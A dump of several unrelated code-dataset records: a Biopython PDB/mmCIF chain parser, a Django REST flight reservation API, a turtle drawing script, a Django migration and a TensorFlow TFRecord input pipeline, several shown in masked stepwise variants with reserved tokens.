for record in SeqIO.parse(path_to_fasta, "fasta")]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0]
if chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1("".join([residue.get_resname() for residue in self.chain]))
seq_from_pdb = re.search("^X*(.*?)X*$", seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace("-", "")
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[end_on_indices]
final_seq = \
[r.get_resname() for r in self.chain.get_residues()
if start <= r.get_id()[1] <= end]
if "UNK" in final_seq:
with open(out_file, "w") as f:
f.write("")
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type="cif"):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == "cif":
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir + f"{pdb_id}.{file_type}")
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
|
flexible
|
{
"blob_id": "ad5cdcfd9d7a3c07abcdcb701422f3c0fdc2b374",
"index": 8860,
"step-1": "<mask token>\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\n<mask token>\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-3": "<mask token>\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.\n parse(path_to_fasta, 'fasta')]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-4": "from Bio import BiopythonWarning, SeqIO\nfrom Bio.PDB import MMCIFParser, Dice, PDBParser\nfrom Bio.SeqUtils import seq1\nimport time\nimport requests\nimport re\nimport warnings\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.\n parse(path_to_fasta, 'fasta')]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-5": "from Bio import BiopythonWarning, SeqIO\nfrom Bio.PDB import MMCIFParser, Dice, PDBParser\nfrom Bio.SeqUtils import seq1\n\nimport time\nimport requests\nimport re\nimport warnings\n\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f\"Some issues with PDB now. Try again later...\\n(URL: {url}\")\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id)\n for record in SeqIO.parse(path_to_fasta, \"fasta\")]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0]\n if chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(\"\".join([residue.get_resname() for residue in self.chain]))\n seq_from_pdb = re.search(\"^X*(.*?)X*$\", seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n\n motif = motif.replace(\"-\", \"\")\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[end_on_indices]\n\n final_seq = \\\n [r.get_resname() for r in self.chain.get_residues()\n if start <= r.get_id()[1] <= end]\n\n if \"UNK\" in final_seq:\n with open(out_file, \"w\") as f:\n f.write(\"\")\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type=\"cif\"):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == \"cif\":\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir + f\"{pdb_id}.{file_type}\")\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-ids": [
4,
6,
7,
9,
10
]
}
|
[
4,
6,
7,
9,
10
] |
../testing.py
|
normal
|
{
"blob_id": "616ff35f818130ebf54bd33f67df79857cd45965",
"index": 6952,
"step-1": "../testing.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Detailedreservation(RetrieveUpdateDestroyAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListReservation(ListCreateAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id=bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api_view(['GET'])
def find_flight(request):
bodyData = request.data
req_flight = Flight.objects.filter(departureCity=bodyData[
'departureCity'], arrivalCity=bodyData['arrivalCity'],
dateOfDeparture=bodyData['dateOfDeparture'])
serialized_flight = FlightSerializer(req_flight, many=True)
return Response(serialized_flight.data)
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id=bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
from django.shortcuts import render
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.permissions import IsAuthenticated
from .models import Flight, Passenger, Reservation
from .serializers import FlightSerializer, PassengerSerializer, ReservationSerializer
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
# Function Based Views Below
@api_view(['GET'])
def find_flight(request):
bodyData = request.data
req_flight = Flight.objects.filter(
departureCity = bodyData['departureCity'],
arrivalCity = bodyData['arrivalCity'],
dateOfDeparture = bodyData['dateOfDeparture']
)
serialized_flight = FlightSerializer(req_flight, many=True)
return Response(serialized_flight.data)
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id= bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
# Non Primary based Operations Below
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
# Primary Key based Operation Below
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
|
flexible
|
{
"blob_id": "d437d77d5a57a6f2f4a2d530be05c3845dce93bc",
"index": 1459,
"step-1": "<mask token>\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ListReservation(ListCreateAPIView):\n <mask token>\n <mask token>\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-3": "<mask token>\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id=bodyData['flightID'])\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-4": "<mask token>\n\n\n@api_view(['GET'])\ndef find_flight(request):\n bodyData = request.data\n req_flight = Flight.objects.filter(departureCity=bodyData[\n 'departureCity'], arrivalCity=bodyData['arrivalCity'],\n dateOfDeparture=bodyData['dateOfDeparture'])\n serialized_flight = FlightSerializer(req_flight, many=True)\n return Response(serialized_flight.data)\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id=bodyData['flightID'])\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-5": "from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import IsAuthenticated\nfrom .models import Flight, Passenger, Reservation\nfrom .serializers import FlightSerializer, PassengerSerializer, ReservationSerializer\nfrom rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\n\n# Function Based Views Below\n\n@api_view(['GET'])\ndef find_flight(request):\n bodyData = request.data\n req_flight = Flight.objects.filter(\n departureCity = bodyData['departureCity'],\n arrivalCity = bodyData['arrivalCity'],\n dateOfDeparture = bodyData['dateOfDeparture']\n )\n serialized_flight = FlightSerializer(req_flight, many=True)\n return Response(serialized_flight.data)\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id= bodyData['flightID'])\n\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\n\n# Non Primary based Operations Below\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\n# Primary Key based Operation Below \n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer",
"step-ids": [
1,
7,
13,
14,
16
]
}
|
[
1,
7,
13,
14,
16
] |
from turtle import *
def drawSquare():
for i in range(4):
forward(100)
left(90)
if __name__ == '__main__':
drawSquare()
up()
forward(200)
down()
drawSquare()
mainloop()
|
normal
|
{
"blob_id": "1ce5b97148885950983e39b7e99d0cdfafe4bc16",
"index": 5382,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\nif __name__ == '__main__':\n drawSquare()\nup()\nforward(200)\ndown()\ndrawSquare()\nmainloop()\n",
"step-4": "from turtle import *\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\nif __name__ == '__main__':\n drawSquare()\nup()\nforward(200)\ndown()\ndrawSquare()\nmainloop()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.0.7 on 2020-07-05 07:34
from django.db import migrations, models
import location_field.models.plain
class Migration(migrations.Migration):
dependencies = [
('driver', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='driver',
name='address',
),
migrations.AddField(
model_name='driver',
name='city',
field=models.CharField(default='', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='driver',
name='image',
field=models.ImageField(default='', upload_to='mechanic_img'),
preserve_default=False,
),
migrations.AddField(
model_name='driver',
name='location',
field=location_field.models.plain.PlainLocationField(default='', max_length=63),
preserve_default=False,
),
migrations.AlterField(
model_name='driver',
name='first_name',
field=models.CharField(max_length=150),
),
migrations.AlterField(
model_name='driver',
name='last_name',
field=models.CharField(max_length=150),
),
]
|
normal
|
{
"blob_id": "ea918bdf96572b38461dc1810bd0b8c16efd0f0d",
"index": 5786,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('driver', '0001_initial')]\n operations = [migrations.RemoveField(model_name='driver', name=\n 'address'), migrations.AddField(model_name='driver', name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False), migrations.AddField(model_name='driver',\n name='image', field=models.ImageField(default='', upload_to=\n 'mechanic_img'), preserve_default=False), migrations.AddField(\n model_name='driver', name='location', field=location_field.models.\n plain.PlainLocationField(default='', max_length=63),\n preserve_default=False), migrations.AlterField(model_name='driver',\n name='first_name', field=models.CharField(max_length=150)),\n migrations.AlterField(model_name='driver', name='last_name', field=\n models.CharField(max_length=150))]\n",
"step-4": "from django.db import migrations, models\nimport location_field.models.plain\n\n\nclass Migration(migrations.Migration):\n dependencies = [('driver', '0001_initial')]\n operations = [migrations.RemoveField(model_name='driver', name=\n 'address'), migrations.AddField(model_name='driver', name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False), migrations.AddField(model_name='driver',\n name='image', field=models.ImageField(default='', upload_to=\n 'mechanic_img'), preserve_default=False), migrations.AddField(\n model_name='driver', name='location', field=location_field.models.\n plain.PlainLocationField(default='', max_length=63),\n preserve_default=False), migrations.AlterField(model_name='driver',\n name='first_name', field=models.CharField(max_length=150)),\n migrations.AlterField(model_name='driver', name='last_name', field=\n models.CharField(max_length=150))]\n",
"step-5": "# Generated by Django 3.0.7 on 2020-07-05 07:34\n\nfrom django.db import migrations, models\nimport location_field.models.plain\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('driver', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='driver',\n name='address',\n ),\n migrations.AddField(\n model_name='driver',\n name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='driver',\n name='image',\n field=models.ImageField(default='', upload_to='mechanic_img'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='driver',\n name='location',\n field=location_field.models.plain.PlainLocationField(default='', max_length=63),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='driver',\n name='first_name',\n field=models.CharField(max_length=150),\n ),\n migrations.AlterField(\n model_name='driver',\n name='last_name',\n field=models.CharField(max_length=150),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
decoded_image.set_shape([height, width, channels])
<|reserved_special_token_0|>
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
files = tf.train.match_filenames_once(
'/home/shenxj/tf-work/datasets/file_pattern-*')
filename_queue = tf.train.string_input_producer(files, shuffle=False)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(serialized_example, features={'image':
tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.
int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.
FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.
int64)})
image, label = features['image'], features['label']
height, width = features['height'], features['wigth']
channels = features['channels']
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
image_size = 299
distorted_image = p182.preprocess_for_train(decoded_image, image_size,
image_size, None)
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],
batch_size=batch_size, capacity=capacity, min_after_dequeue=
min_after_dequeque)
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate
).minimize(loss)
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
import tensorflow as tf
import p182.py as p182
files = tf.train.match_filenames_once(
'/home/shenxj/tf-work/datasets/file_pattern-*')
filename_queue = tf.train.string_input_producer(files, shuffle=False)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(serialized_example, features={'image':
tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.
int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.
FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.
int64)})
image, label = features['image'], features['label']
height, width = features['height'], features['wigth']
channels = features['channels']
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
image_size = 299
distorted_image = p182.preprocess_for_train(decoded_image, image_size,
image_size, None)
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],
batch_size=batch_size, capacity=capacity, min_after_dequeue=
min_after_dequeque)
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate
).minimize(loss)
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
# encoding:utf-8
import tensorflow as tf
import p182.py as p182
# 创建文件列表,并通过文件列表创建输入文件队列。在调用输入数据处理流程前,需要
# 统一所有原始数据的格式并将它们存储到TFRcord文件中。下面给出的文件列表应该包含所
# 有提供训练数据的TFRcord文件
files = tf.train.match_filenames_once("/home/shenxj/tf-work/datasets/file_pattern-*")
filename_queue = tf.train.string_input_producer(files, shuffle=False)
# 使用类似7.1节中结婚嫂的方法解析TFRecord文件里的数据。这里假设image中存储的是图像
# 的原始数据,label为该样例所对应的标签。height,width和channels给出了图像的维度。
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(
serialized_example,
features={
'image': tf.FixedLenFeature([], tf.string),
'label': tf.FixedLenFeature([], tf.int64),
'height': tf.FixedLenFeature([], tf.int64),
'weigth': tf.FixedLenFeature([], tf.int64),
